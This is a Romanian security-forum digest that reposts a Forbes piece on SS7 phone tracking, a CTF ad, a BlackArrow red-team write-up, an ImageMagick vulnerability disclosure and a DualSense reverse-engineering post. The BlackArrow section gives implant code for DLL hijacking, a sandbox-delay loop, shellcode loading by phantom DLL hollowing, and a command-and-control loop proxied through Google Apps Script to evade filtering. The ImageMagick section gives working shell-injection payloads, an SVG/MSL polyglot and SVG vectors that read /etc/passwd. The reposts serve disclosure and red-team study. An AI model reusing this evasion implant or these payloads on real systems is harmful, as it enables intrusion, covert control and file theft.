Nytro

Cumperi unul cu 5$ de la DigitalOcean, Vultr sau alti provideri de VPS-uri. Iti vine parola pe mail sau o setezi din interfata web, te loghezi prin SSH si incepi sa "hachezi".

This Surveillance Tool Can Find You With Just Your Telephone Number — And These 25 Countries Bought It, Warn Researchers Thomas Brewster Forbes Staff Cybersecurity Associate editor at Forbes, covering cybercrime, privacy, security and surveillance. A surveillance technology that can identify the location of a phone anywhere in the world in just seconds with only a telephone number has been sold to 25 countries, some with chequered records on human rights, according to research released Tuesday. The tech was supplied by the Israeli business Circles, claimed Citizen Lab, a University of Toronto organization that has long tracked the activities of surveillance companies. Circles is a sister company of NSO Group, an iPhone and Android spyware developer that is currently being sued by Facebook over attacks on the WhatsApp accounts of 1,400 users and has been criticized for selling to nations who went on to spy on activists, journalists and other citizens. According to Citizen Lab, the Circles tracking tool was detected in both Western, democratic countries, and nations with poor human rights records. The full list, according to Citizen Lab and neither confirmed nor denied by Circles, included: Australia, Belgium, Botswana, Chile, Denmark, Ecuador, El Salvador, Estonia, Equatorial Guinea, Guatemala, Honduras, Indonesia, Israel, Kenya, Malaysia, Mexico, Morocco, Nigeria, Peru, Serbia, Thailand, the United Arab Emirates (U.A.E.), Vietnam, Zambia, and Zimbabwe. Technology made by Circles, an Israeli intelligence provider, can find a person's phone with just their number. As many as 25 countries use it, leading to concerns about ethics. GETTY The technique used by the Circles snooping tech is known as Signaling System 7 (SS7) exploitation, a powerful yet difficult-to-detect tool in government spy arsenals. It’s named after the portion of the telecoms network that deals with cross-border functionality and billing. When, for instance, you travel to another country, the SS7 network is used to move your phone over to a partner telecoms provider and adjust billing accordingly. But should a surveillance vendor have access to SS7 networks, either via hacking or acquiring it, they can send commands to a subscriber’s “home network” falsely indicating the subscriber is roaming. That will, in turn, reveal their location, though only the coordinates of the cell tower closest to the phone. It may also be possible to intercept calls and texts through SS7 exploitation, though Circles technology is only for location detection, according to two industry sources. (According to trademark filings, it does have a technology called PixCell for “tapping into or intercepting targets' wireless, telephone, computer, and internet communications.”) If such a significant number of countries have bought access to the Circles tool, it would indicate that all can locate a phone, and its owner, at rapid speed. Marczak noted that one of the main selling points of the Circles tool was that it didn’t need cooperation from a telecoms company. If used by countries with lax rule of law and human rights controls, it could help repressive government surveillance agencies track targets across borders, without the need for a warrant, Citizen Lab researcher Bill Marczak warned. Many of the countries listed as likely Circles customers have a track record of using surveillance tools against dissidents and activists, Citizen Lab claimed. Forbes previously revealed Circles’ sales to Mexico, whilst others had reported on deals with the U.A.E., where it was alleged the company’s tools were used to carry out surveillance on the Emir of Qatar and the prime minister of Lebanon. The U.A.E., for instance, allegedly targeted the now imprisoned activist Ahmed Mansoor with malware from at least three different companies - NSO Group included - before arresting him in 2017. Mexico, meanwhile, “serially abused NSO Group’s Pegasus spyware” in targeting at least 25 reporters, human rights defenders, and the families of individuals killed or disappeared by cartels, according to previous Citizen Lab research. NSO has always stated that it works for legitimate government agencies on investigations into the worst kinds of crimes, and has an ethics committee that reviews contracts, though it cannot comment on the identity of its customers. “Given Circles' affiliation with NSO Group, and repeated spyware abuse by NSO customers, it's disappointing to see Western governments patronizing the company,” added Marczak. An NSO spokesperson gave Forbes a joint NSO and Circles response, stating: “NSO and Circles are separate companies within the same corporate family, both of which lead their industries in a commitment to ethical business and adhere to strict laws and regulations in every market in which they operate. As we have previously stated, Circles is involved in search and rescue and tactical geolocation technology. “We cannot comment on a report we have not seen. Given Citizen Lab’s track record, we imagine this will once again be based on inaccurate assumptions and without a full command of the facts. As ever, we find ourselves being asked to comment on an unpublished report from an organization with a predetermined agenda.” The spokesperson declined to comment on the countries listed by Citizen Lab as customers. Citizen Lab said it tracked down Circles customers by looking for a unique “fingerprint” on servers across the globe that helped them identify where the spy tool was deployed. That fingerprint was built on numerous data points, most significantly a web domain that was linked to Circles business, according to the full technical report. Spying in Circles Circles was an independent intelligence agency vendor up until 2014, when it was acquired by private equity company Francisco Partners for $130 million and merged into a larger surveillance company. That umbrella organization also included NSO Group. But Circles isn’t the only SS7 surveillance provider on the market. Cyprus-based Intellexa, set up by former Circles co-founder Tal Dilian, uses SS7 exploitation as one of its many tools to track a target. Israeli companies Verint, Rayzone and 1rstWAP offer similar services, according to one industry executive. Ability Inc., another Israeli firm, tried to take the tech global, but crashed out of the Nasdaq after failing to secure customers. Those providers’ days should, in theory, be numbered, if they stick to solely doing SS7 attacks. The flaws that allow SS7 attacks to take place have long been fixable. The attacks are only possible because SS7, in its original form, doesn’t require any authentication to guarantee the legitimacy and safety of messages traversing the network. It would require some effort by global telecoms networks to address the flaws, but some efforts have been made to patch the vulnerabilities. The U.K., for instance, recently proposed telecommunications security legislation that would grant a regulator the authority to ensure the nation’s networks are secure against SS7 attacks. Nevertheless, whilst those gaping holes remain open across global networks, government spies can continue to track anyone, anywhere, with just their phone number. Sursa: https://www.forbes.com/sites/thomasbrewster/2020/12/01/this-spy-tool-can-find-you-with-just-a-telephone-number-and-25-countries-own-it-warn-researchers/?sh=78620548331e

DefCamp It's the final countdown for the #DefCamp #CTF! Only a few days left to sign up your team! We promise FUN, engagement, awesome prizes, and a memorable experience to add to your track record! Details + SIGN UP links below. https://dctf2020.cyberedu.ro/

Hindering Threat Hunting, a tale of evasion in a restricted environment Written by: Borja Merino 24 November, 2020 It is both common and important for the development of a Red Team exercise to obtain information about the technologies and restrictions of the environment where our TTPs are going to be executed. This information mainly implies substantial changes in our modus operandi. Generally, one of these changes is to put aside known/public offensive tools and develop our own custom implants ad-hoc for the customer’s ecosystem, at the initial stages of infection where the chances of detection are high. The following case that we would like to share is a clear example of this type of exercise. In one of our clients, we did obtain information about the EDR (Endpoint Detection & Response) technology deployed and the network restrictions for outgoing connections, where only domains such as Google, Microsoft, etc. are allowed. After studying different approaches to bypass these restrictions, we proceed to develop a custom implant with the necessary capabilities to reach the BlackArrow C&C and carry out various post-exploitation actions without being detected. The following diagram represents the steps performed by the implant: Implant logic Step 1: DLL Order Hijacking It is known that the use of DLL Order Hijacking is still quite efficient not only with AVs but also against EDR technologies. It is no wonder that multiple actors have been using these evasion techniques for years. As an input vector for the exercise, we chose one of the binaries used in a recent campaign described by Dr. Web in his report “Study of the ShadowPad APT backdoor and its relation to PlugX” . Specifically, we used the legitimate binary TosBtKbd.exe signed by TOSHIBA CORPORATION that, as shown below, is susceptible to DLL order hijacking in its function 0x4024A0. DLL Order Hijacking (TosBtKbd.exe) As we can see in the image, the DLL “TosBtKbd.dll” is loaded, via LoadLibrary(), without specifying its full path, making it possible to load a harmful DLL. Notice that the SetTosBtKbdHook symbol is invoked immediately. Step 2: RC4 Decryption (reflective PE) Running TosBtKbd.exe will trigger the harmful actions through our DLL. The skeleton of this library is shown below. //#include "syscalls.h" //SysWhispers void __stdcall UnHookTosBtKbd(void) {} void __stdcall SetTosBtKbdHook(void) { char key[11]; stale(); //Get RC4 Key (TimeDateStamp DWORD value) DWORD ts = getKey(); if (ts == NULL) return; sprintf_s(key, "%X", ts); DWORD dwCount; //Get encrypted shellcode from resource PCHAR exec = getResource(&dwCount); if (exec != NULL) { //Decrypt shellcode decrypt(key, exec, &dwCount); //Lazy check (reflective loading stub) if ((exec[1] == 'Z') && (exec[2] == 'E')) { uint8_t* pMapBuf = nullptr, * pMappedCode = nullptr; uint64_t qwMapBufSize; //Phantom DLL hollowing //Ref: github.com/forrest-orr/phantom-dll-hollower-poc //bTxF <-- (check NtCreateTransaction on the system) if (HollowDLL(&pMapBuf, &qwMapBufSize, (const uint8_t*)exec, dwCount, &pMappedCode,bTxF)){ VirtualFree(exec, NULL, MEM_RELEASE); //Less obvious indirect call __asm { mov eax, pMappedCode push eax; ret } } } } } First of all, the stale() function is run. Its goal is to distract and confuse some machine learning checks and sandboxes that execute the DLL looking for malicious activity. By playing with the variable limit, we can get a delay of seconds/minutes before executing the malicious actions. double c(int num1) { return (16 / (num1 * pow(5.0, num1 * 1.0))); } double c1(int num1) { return (4 / (num1 * pow(249.0, num1 * 1.0))); } void stale() { // Stale code. Play with the "limit" var to look for a delay you feel happy with double limit = 100; int j = 0; double ans1 = 0.0; double ans2 = 0.0; int flag = 1; for (j = 1; j <= limit; j += 1) { if (flag == 1) { ans1 += c(j); ans2 += c1(j); flag = 0; } else { ans1 -= c(j); ans2 -= c1(j); flag = 1; } } printf("%f", ans1); } Afterwards, an embedded resource in the DLL will be loaded and decrypted using the Windows CryptoAPI. This resource is a binary encrypted with RC4 that implements the main logic of the implant, that is, to establish communication with our C&C and execute post-exploitation actions. Resource decryption (reflective PE) It has been observed that some EDRs exclusively upload the unknown binaries to their cloud-sandbox for analysis, which is why TosBtKbd.exe’s TimeDataStamp has been used as RC4 key. Using a key from a file header of the container process, will make necessary an analysis within the appropriate context to recover the decrypted binary, which translates into more time for a hunter or malware analyst to obtain artifacts of interest such as, for example, the IP or domain of our C&C. The following image shows the creation of the reflective PE from the binary compiled from Visual Studio using pe_to_shellcode (developed by security researcher Hasherezade). Note that later the binary is encrypted with RC4 using the TosBtKbd.exe’s TimeDataStamp. Reflective PE generation (RC4 encryption) Step 3: Phantom DLL In order to make memory hunting more difficult and as an alternative to the most common injection techniques, Phantom DLL Hollowing has been used. Using this approach, created by the researcher Forrest Orr, it is possible to execute the binary within a + RX section, making it very difficult to detect it using traditional tools based on RWX allocations or suspicious threads. In our case, the DLL used to make the phantom is aadauthhelper.dll, which was chosen based on the size of its .text section to house our reflective PE. You can notice the loader stub right at the beginning of that section (0x556C1000). RX section (aadauthhelper.dll) To start our implant’s execution, once the Hollowing DLL has been done, the classical cast of a function pointer (call eax) has been replaced with a less obvious indirect call: push eax, ret. //Phantom DLL hollowing //Ref: github.com/forrest-orr/phantom-dll-hollower-poc //bTxF <-- (check NtCreateTransaction on the system) if (HollowDLL(&pMapBuf, &qwMapBufSize, (const uint8_t*)exec, dwCount, &pMappedCode, bTxF)) { VirtualFree(exec, NULL, MEM_RELEASE); //Less obvious indirect call __asm { mov eax, pMappedCode push eax; ret } Step 4: C2 connections through Google Apps Script Perhaps, one of the trickiest parts of this exercise was the outgoing communications as it was a specially controlled environment. Regarding various alternatives, such as Domain-Fronting and similar techniques, we opted for something more “innovative”. In this context, we took an idea from a Forcepoint analysis on certain Carbanak TTPs where said actor abused the Google Apps Script to send and receive commands. Instead of using said platform as a command and control server, its scripting capabilities would be used to configure a proxy that allows us to reach our C&C. It should be noted that there are various offensive tools that already take advantage of this platform in a very similar way to the initial idea raised by the Red Team/Threat Hunting team at BlackArrow. However, given the small number of real incidents that make use of these TTPs, it was considered that it could be the most appropriate approach to test the filtering capabilities of our target. The result has been the development of a binary in C that makes use of the approach described in the following graphic. Connections through proxy (Google Apps Script) At first, our implant will launch a GET request (via HTTPS) in which it will embed, in one of its parameters, the URL of the C&C. This URL will be extracted from Google Apps Script and will act as an intermediary between the client’s communications and the control server. After receiving the first GET, our C&C will return a random 10-byte token to the client. This token ensures that the connection comes from a legitimate host. Periodically, the implant, via POST, will check for new jobs. The result of these jobs (ps, screenshot, getinfo, etc.) will be sent to our C&C encoded in base64. The code snippet belows shows the main loop in charge of managing the collection and sending of the results associated with each job. The runJob() function will be responsible for executing, through a switch case, each of the control commands and returning the result encoded in base64. void C2_jobs(HINTERNET hConnect, TCHAR* urlPost) { DWORD dwBytesRead; TCHAR* token = new char[BUFSIZ + 1]; const TCHAR* job = "/job"; TCHAR jobvalue[JSIZE]; TCHAR* urlJob, * urlTmp = NULL; payenc_t pEncoded; pEncoded.payenc = NULL; urlJob = concatenate((const TCHAR*)urlPost, (TCHAR*)"/job/"); while (true) { Sleep(timer); HINTERNET hHttpFile = HttpOpenRequest(hConnect, "POST", urlPost, NULL, NULL, NULL, INTERNET_FLAG_SECURE, NULL); if (!HttpSendRequest(hHttpFile, NULL, NULL, NULL, NULL)) return; if (!InternetReadFile(hHttpFile, token, BUFSIZ + 1, &dwBytesRead)) return; if (dwBytesRead != 0) { token[dwBytesRead] = 0; if (sscanf_s(token, "job=%[^\n]", jobvalue, sizeof jobvalue) == 1) { urlTmp = concatenate((const TCHAR*)urlJob, jobvalue); pEncoded = runJob(jobvalue); hHttpFile = HttpOpenRequest(hConnect, "POST", urlTmp, NULL, NULL, NULL, INTERNET_FLAG_SECURE, 0); if (!HttpSendRequest(hHttpFile, NULL, 0, pEncoded.payenc, pEncoded.size)) return; if (pEncoded.payenc != NULL) { free(pEncoded.payenc); pEncoded.payenc = NULL; } free(urlTmp); memset(jobvalue, '\0', JSIZE); } } } } The following code was used to manage connection in Google Apps Script proxy configuration: function doGet(e) { var url = decodeURIComponent(e.parameter.url); try { var response = UrlFetchApp.fetch(url); } catch (e) { return e.toString(); } var cookie = response.getAllHeaders()['Set-Cookie'] return ContentService.createTextOutput(cookie); } function doPost(e) { Logger.log('[+] Post Done!'); payload = ""; if(e.postData){ payload = e.postData.getDataAsString(); } else { Logger.log("[-] Post Error :(") payload = "!!Error"; } var options = { 'method' : 'post', 'payload' : payload }; var url = decodeURIComponent(e.parameter.url); try { var response = UrlFetchApp.fetch(url,options); } catch (e) { return e.toString(); } Logger.log('UrlFetch Response: %s',response); return ContentService.createTextOutput(response.getContentText()); } As we can see in the following image, the client, from the TosBtKbd.exe address space or, to be more exact, from the mapped view (image memory) linked with aadauthhelper.dll, will communicate with the script.google.com service allowing us to bypass the organization’s filtering countermeasures. Memory / Connections In the C&C part, a simple Python service was developed to manage the listeners and the various post-exploitation tasks. C&C server Below is a video of one of the proofs of concept run on a Windows 10 2004. Sursa: https://www.blackarrow.net/hindering-threat-hunting-a-tale-of-evasion-in-a-restricted-environment/

ImageMagick - Shell injection via PDF password "Use ImageMagick® to create, edit, compose, or convert bitmap images. It can read and write images in a variety of formats (over 200) including PNG, JPEG, GIF, HEIC, TIFF, DPX, EXR, WebP, Postscript, PDF, and SVG [ and many more ]"1 In 2016 ImageTragick was revealed. The associated reseachers showed that ImageMagick is not only powerful, eg you can read local files, but that it is possible to execute shell commands via a maliciously crafted image. In late 2016 and in 2018 Tavis Ormandy (@taviso) showed how the support of external programs ( ghostscript) in ImageMagick could lead to remote execution. Given the past research I had a quick look at the supported external programs (libreoffice/openoffice I already spent quite some time on), and I decided to get a proper understanding how IM (ImageMagick) calls external programs and the way they fixed the shell injections in the ImageTragick report. As you are reading this blogpost, it paid off and I found a vulnerability. But I also learned two things: Note: 1) The IM team is really active and is trying to address any issue raised quickly (thats important later) 2) ImageMagick is an awesome tool to convert files. It supports some really weird old file types (often via external programs) and is trying to be as user friendly as possible, maybe a little too much ^^ The Fix: ImageMagick, https and cURL An important part of ImageMagick and how it handles files is not solely the infamous delegates.xml file but the coders folder. The delegates.xml file specifies the commands and parameters to call an external program to handle a certain file type. But before that the handlers in the aforementioned coders folders are used to parse a file and determine if an external program needs to be called (this is a simplification but in most cases it works this way) As there are lot of files in coders, I decided to check how https: URLs are handled by ImageMagick as I already knew curl will be used in the end, which was vulnerable to command injection. To keep it short - the https: handler is registered in this line: https://github.com/ImageMagick/ImageMagick/blob/master/coders/url.c#L327 In case IM has to handle https: URLs - the following branch is called: https://github.com/ImageMagick/ImageMagick/blob/master/coders/url.c#L157 status=InvokeDelegate(read_info,image,"https:decode",(char *) NULL, InvokeDelegate calls InterpretDelegateProperties, which calls GetMagickPropertyLetter, which calls SanitizeDelegateString. whitelist[] = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789 " "$-_.+!;*(),{}|\\^~[]`\"><#%/?:@&="; [...] for (p+=strspn(p,whitelist); p != q; p+=strspn(p,whitelist)) *p='_'; return(sanitize_source); This function basically replaces ' (single quotes) with "_" on non-windows system (which I assume as the default). This is important as in the end ExternalDelegateCommand is called. This function handles calling external executables. The defined curl command in delegates.xml is used and the user defined URL is included in single quotes. As single quotes were filtered before, it is not possible to inject additional shell commands. I verified that by modifying the source code of IM and included some printf statements to dump the created command. So let's assume a SVG or MVG (an example is available in ImageTragick) that specifies an https: URL like this: <svg width="200" height="200" xmlns:xlink="http://www.w3.org/1999/xlink"> xmlns="http://www.w3.org/2000/svg"> <image xlink:href="https://example.com/test'injection" height="200" width="200"/> </svg> Command line: convert test.svg out.png The created shell command by ImageMagick looks like this: curl -s -k -L -o 'IMrandomnumber.dat' 'https://example.com/test_injection' Important Note: As shown by this example, different coders can call each other as in this case SVG triggers the execution of the url.c coder. In case ImageMagick is compiled to use a third-party library like librsvg to parse SVG files, the third party library handles protocols by itself. In this scenario it is still possible to trigger ImageMagicks own SVG parsers via the MSVG support ("ImageMagick's own SVG internal renderer"): convert test.msvg out.png ImageMagick also allows to set a specific handler via this syntax: convert msvg:test.svg out.png Short intermission - reading local files As ImageMagick allows to set specific file handlers as shown above, I decided to make a quick assessment, which handlers could allow to read and leak local files. My test case assumed that a user controlled SVG file is converted by IMs internal SVG parser to a PNG file, which is returned to the end user afterwards. An example could be an avatar upload on a website. convert test.svg userfile.png The first powerful coder is already mentioned in ImageTragick - text:. 'The "text:" input format is designed to convert plain text into images consisting one image per page of text. It is the 'paged text' input operator of ImageMagick.'. The coder is registered in txt.c. <svg width="1000" height="1000" xmlns:xlink="http://www.w3.org/1999/xlink"> xmlns="http://www.w3.org/2000/svg"> <image xlink:href="text:/etc/passwd" height="500" width="500"/> </svg> Another example to read /etc/passwd is based on LibreOffice. This is possible as LibreOffice supports the rendering of a text file. As ImageMagick has no support for this file type, the corresponding protocol handler can be found via the decode property in delegates.xml. This vector only works of course when OpenOffice/LibreOffice is installed: <svg width="1000" height="1000" xmlns:xlink="http://www.w3.org/1999/xlink"> xmlns="http://www.w3.org/2000/svg"> <image xlink:href="odt:/etc/passwd" height="500" width="500"/> </svg> It is also possible to use html: - in case html2ps is installed. Although ImageMagick registers a "HTML" handler, it only sets an encoder entry. Encoders only handle the creation/writing but not reading (this is done by the decoders) of the file type. Therefore the decoder in delegates.xml is used: <svg width="1000" height="1000" xmlns:xlink="http://www.w3.org/1999/xlink"> xmlns="http://www.w3.org/2000/svg"> <image xlink:href="html:/etc/passwd" height="500" width="500"/> </svg> This is not an exhausted list but should document the general idea. Back to the shell injection. Entry Point - Encrypted PDFs After I got an understanding of the usage of curl, I checked again the command defined in delegates.xml: <delegate decode="https:decode" command="&quot;@WWWDecodeDelegate@&quot; -s -k -L -o &quot;%u.dat&quot; &quot;https:%M&quot;"/> %M is replaced with the user-controlled URL. Therefore, I checked all occurrences of %M and if they are handled correctly. Additionally I had a look at all the defined replacement values defined in property.c. In the end nothing yielded a proper injection vulnerability. Then I stumbled upon the following line in the pdf.c coder: (void) FormatLocaleString(passphrase,MagickPathExtent, "\"-sPDFPassword=%s\" ",option); As this seemed to set a password, which is most likely fully user controlled, I looked up how this parameter can be set and if it could be abused. Based on the changelog, ImageMagick added a "-authenticate" command line parameter in 2017 to allow users to set a password for encrypted PDFs. So, I tested it via the following command to dump the created command: convert -authenticate "password" test.pdf out.png Shell command created: 'gs' -sstdout=%stderr -dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000 -dAlignToPixels=0 -dGridFitTT=2 '-sDEVICE=pngalpha' -dTextAlphaBits=4 -dGraphicsAlphaBits=4 '-r72x72' "-sPDFPassword=password" '-sOutputFile=/tmp/magick-YPvcqDeC7K-Q8xn8VZPwHcp3G1WVkrj7%d' '-f/tmp/magick-sxCQc4-ip-mnuSAhGww-6IFnRQ46CBpD' '-f/tmp/magick-pU-nIhxrRulCPVrGEJ868knAmRL8Jfw9' As I confirmed that the password is included in the created gs command, which parses the specified PDF, it was time to check if double quotes are handled correctly: convert -authenticate 'test" FFFFFF' test.pdf out.png 'gs' -sstdout=%stderr -dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000 -dAlignToPixels=0 -dGridFitTT=2 '-sDEVICE=pngalpha' -dTextAlphaBits=4 -dGraphicsAlphaBits=4 '-r72x72' "-sPDFPassword=test" FFFFFF" '-sOutputFile=/tmp/magick-YPvcqDeC7K-Q8xn8VZPwHcp3G1WVkrj7%d' '-f/tmp/magick-sxCQc4-ip-mnuSAhGww-6IFnRQ46CBpD' '-f/tmp/magick-pU-nIhxrRulCPVrGEJ868knAmRL8Jfw9 To my surprise I was able to prematurely close the -sPDFPassword parameter, which allows me to include additional shell commands. The specified "password" has to contain one of the following characters "&;<>|" so the shell injection gets actually triggered. The reason being that ImageMagick will only use the system call (and therefore the system shell) in case one of these characters is present: if ((asynchronous != MagickFalse) || (strpbrk(sanitize_command,"&;<>|") != (char *) NULL)) status=system(sanitize_command); Putting alltogether I tested the following command: convert -authenticate 'test" `echo $(id)> ./poc`;"' test.pdf out.png Shell command created: 'gs' -sstdout=%stderr -dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000 -dAlignToPixels=0 -dGridFitTT=2 '-sDEVICE=pngalpha' -dTextAlphaBits=4 -dGraphicsAlphaBits=4 '-r72x72' "-sPDFPassword=test" `echo $(id)> ./poc`;"" '-sOutputFile=/tmp/magick-pyNxb2vdkh_8Avwvw0OlVhu2EfI3wSKl%d' '-f/tmp/magick-IxaYR7GhN3Sbz-299koufEXO-ccxx46u' '-f/tmp/magick-GXwZIbtEu63vyLALFcqHd2c0Jr24iitE' The file "poc" was created and it contained the output of the id command. At this point I had a confirmed shell injection vulnerability. The problem was: It is unlikely that a user has the possibility to set the authenticate parameter. So I decided to look for a better PoC: Explotation - MSL and Polyglots I needed to find a way to set the "-authenticate" parameter via a supported file type and I already knew where to look at: ImageMagick Scripting Language (MSL). This is a XML based file format supported by ImageMagick, which allows to set the input file, output file and additional parameters. An example file can be found here - I simplified it a bit: <?xml version="1.0" encoding="UTF-8"?> <image> <read filename="image.jpg" /> <get width="base-width" height="base-height" /> <resize geometry="400x400" /> <write filename="image.png" /> </image> This file format is not properly documented, which is mentioned by the ImageMagick team, so I checked the source code regarding the supported attributes. I quickly discovered the following line in the source code of the MSL coder: if (LocaleCompare(keyword,"authenticate") == 0) { (void) CloneString(&image_info->density,value); break; } Via additional debug calls I verified that this path handles any tag, which sets the authenticate attribute. But the code assigns the defined value to the density property, which made no sense. After studying the rest of the MSL code I came to the following conclusion: 1) This code should set the authenticate attribute similar to the "-authenticate" command line parameter. 2) The code was simply wrong and therefore blocking the possibility to abuse the shell injection. So I decided to do something I haven't done before: Mention this problem via Github and see if it gets fixed (I created a new github account for that) - https://github.com/ImageMagick/ImageMagick/discussions/2779 In the end the code was fixed correctly: if (LocaleCompare(keyword,"authenticate") == 0) { (void) SetImageOption(image_info,keyword,value); break; } I immediately created a PoC MSL script to verify I could abuse the shell injection. Note that it is necessary to specify the msl: protocol handler so IM actually parses the script file correctly: <?xml version="1.0" encoding="UTF-8"?> <image authenticate='test" `echo $(id)> ./poc`;"'> <read filename="test.pdf" /> <get width="base-width" height="base-height" /> <resize geometry="400x400" /> <write filename="out.png" /> </image> convert msl:test.msl whatever.png And it worked - the "poc" file was created, proofing the shell injection. Last step: Wrap this all up in one SVG polyglot file. SVG MSL polyglot file: My created polyglot file is a SVG file, which loads itself as an MSF file to trigger the shell injection vulnerability. I will start showing the SVG polyglot file and explain its structure: poc.svg: <image authenticate='ff" `echo $(id)> ./0wned`;"'> <read filename="pdf:/etc/passwd"/> <get width="base-width" height="base-height" /> <resize geometry="400x400" /> <write filename="test.png" /> <svg width="700" height="700" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"> <image xlink:href="msl:poc.svg" height="100" width="100"/> </svg> </image> First of all the SVG structure has an image root tag. As the parser does not enforce that the SVG tag is the root tag, IM has no problems parsing this file as a SVG. The SVG structure specifies an image URL, which uses msl:poc.svg. This tells ImageMagick to load poc.svg with the MSL coder. Although MSF is a XML based structure, the MSF coder does not deploy a real XML parser. It only requires that the file starts with a tag it supports. Another trick I used is present in the read tag. It is necessary to target a PDF file to trigger the vulnerability. To bypass this necessity, I specified any known local file and used the pdf: protocol handler to ensure it is treated as a PDF: PoC file in action: The PoC is still not perfect as I have to assume the filename does not get changed as the file has to be able to reference itself. But I decided thats good enough for now. PreConditions and protection Obviously this vulnerable only works in case ImageMagick is not compiled with a third-party library, which handles PDF parsing. Also a user has to be able to set the "authenticate" parameter, either via the command line or via MSL (as shown in my PoC file). In case ImageMagick must not handle PDF files, it is possible to disable the PDF coder via the policy.xml file therefore preventing the shell injection. How to configure policy.xml is already documented by https://imagetragick.com/ (just include "PDF"). Affected versions: - Injection via "-authenticate" -ImageMagick 7: 7.0.5-3 up 7.0.10-40 - Explotation via MSL: - ImageMagick 7: 7.0.10-35 up 7.0.10-40 Regarding ImageMagick 6 (aka legacy). Based on the source code the following versions should be vulnerable. - Injection via "-authenticate" - ImageMagick 6: 6.9.8-1 up to 6.9.11-40 - Explotation via MSL: -ImageMagick 6: 6.9.11-35 up to 6.9.11-40 I focused my testing solely on ImageMagick 7 so I tried ImageMagick 6 really late. It seems the "-authenticate" feature is broken in the legacy branch. But during testing my VM died so I leave it to the readers to create a PoC for ImageMagick 6 (or maybe I will do it as soon as I have some free time) Timeline: - 2020-11-01: Reported the vuln to ZDI - 2020-11-16: Didn't want to wait for any response from ZDI so reported the issue to ImageMagick - 2020-11-16: ImageMagick deployed a fix and asked me if I could wait for disclosure, as there is a release planned for this weekend. - 2020-11-16-20: Discussed the fix with the ImageMagick team. - 2020-11-21: Version 7.0.10-40 and 6.9.11-40 released. I want to thank the ImageMagick developers. They try to address and fix any issues raised as quick as possible (feature or security related, doesn't matter). Additionally they allowed me to provide input how I would address the issue (which is not always accepted^^). Eingestellt von Alex Inführ um 4:35 AM Sursa: https://insert-script.blogspot.com/2020/11/imagemagick-shell-injection-via-pdf.html

In this video, Filedescriptor introduces his Chrome Extension "Untrusted Types" that abuses Trusted Types and demonstrates how easy it is to find DOMXSS using it. Untrusted Types GitHub repo: https://github.com/filedescriptor/unt... Google's Firing Range: https://public-firing-range.appspot.com/ Prompt(1) to win: https://prompt.ml

This video explores the world of Server-Side Template Injections, primarily we'll look at Python with Flask framework as an example, but the core ideas explained in the video is applicable to wide set of Languages and Frameworks. 🐤 Twitter: https://twitter.com/PwnFunction 🎵 Track: Warriyo - Mortals (feat. Laura Brehm) NCS link: https://www.youtube.com/watch?v=yJg-Y...

DualSense Reverse Engineering Reading time ~6 min Posted by Emmanuel Cristofaro on 23 November 2020 Categories: Fun, Hardware, Playstation, Reversing, Dual-pod-shock, Dualsense, Dualshock, Sony, Stutm Ciao belli! On the 19th of November 2020, SONY finally released the new PlayStation 5 in the UK. A few days earlier in the US, Japan, and Canada. Of course, Play Station 5 came together with a new Wireless Controller, this time named DualSense. I wanted to see if I could continue my PlayStation controller adventures on this new device, following on my previous work. A few SONY installations available in London for the release of the PlayStation 5. DualSense Wireless Controller The DualSense Wireless Controller presents new features such as: Haptic feedback, vibration sense via actuators (no more rumble motors), these are the components that manages and controls the movement mechanism. Adaptive triggers, intensified game experience interaction when force and tension are applied on buttons. A built-in microphone. More LEDs. I bought it just for the sake of playing with it. The DualSense Wireless Controller. Yes, just the DualSense Wireless Controller. DualSense arrived. When using the DualSense via USB it was possible to hear sounds from the speaker. With the DualShock 4, this was not possible. The speaker of the DualSense works in Stereo mode. What a pity, the speaker of the previous controller, the DualShock 4, was in Mono mode and I loved it for this reason. The quality of the sound issued when playing blues reminded me of a vintage radio. One of those that are convenient to have while camping. I don’t know… there was some kind of magic to it. The speaker power while playing light music. Music coming from the speaker. Teardown Below is a little teardown of the DualSense Wireless Controller model CFI-ZCT1W. Front. Back. Charger port. Headset port. Front mask. Actuators. Digital buttons. Microphone. Battery. PCB Side B. PCB Side A. I spent the last weekend reversing the DualSense Wireless Controller. Tests were conducted after connecting the DualSense to a host machine via a USB cable and, with a few lines of code, it was possible to read HID reports sent by the device. char *DS = "/dev/hidraw0"; char bufRead[16]; int fd, res; fd = open(DS, O_RDWR|O_NONBLOCK); /* Get a report from the device */ res = read(fd, bufRead, sizeof(16)); if (res < 0) { perror("read"); } else { printf("read() read %d bytes:\n\t", res); for (i = 0; i < res; i++){ /* This will print out the part we are interest at */ printf("%hhx ", bufRead[i]); puts("\n"); } } close(fd); return 0; The output generated by the above piece of code changed each time a button was pressed down. The buttons Square, Exe, Circle, and Triangle were associated with the byte number 8 and its value changed every time one of those buttons were used. Square: 0x18 Exe: 0x28 Circle: 0x48 Triangle: 0x88 Below some examples. Exe. Circle. I wrote a script and started sending a bunch of bytes at a time to the DualSense in order to understand how to control/use its functionalities. The resulting breakdown. A few hours later, this resulted in me being able to intercept the pressed buttons and trigger LEDs and actuators. The full Proof of Concept is available on GitHub. The result. Dual-Pod-Shock Happy with the result I obtained in such a short time, I decided to work on the Dual-Pod-Shock project I have been working on last year and added the same functionalities to interact with the device while the music is playing. For more information about the Dual-Pod-Shock project refer to this page: https://orangecyberdefense.com/global/blog/sensepost/dual-pod-shock-emotional-abuse-of-a-dualshock/ With Dual-Pod-Shock it is now possible to use the new functionalities by pressing Square, Exe, Circle, and Triangle. One at a time. This action will also trigger the LED, which will change colour based on the button that is pressed. Below the new functionalities implemented: Square: Decrease the volume (R: FF, G: 14, B: 93) Exe: Increase the volume (R: 00, G: 00, B: FF) Circle: Switch ON the motors (R: FF, G: 00, B: 00) Triangle: Switch OFF the motors (R: 00, G: FF, B: 00) Testing the new functionalities added. In order to play some music via Bluetooth, it was necessary to use SBC files. These files were generated by using a Gstreamer plugin called SBCENC. With the first attempts, the results were good but the audio was a bit stuttery. Multiple tests were conducted to mitigate this problem. Finally, the problem was solved by converting the tracks from MP3 to SBC using the below command. $ gst-launch-1.0 -q filesrc location=audiofilename.mp3 ! decodebin ! audioconvert ! audiosample ! sbcenc ! 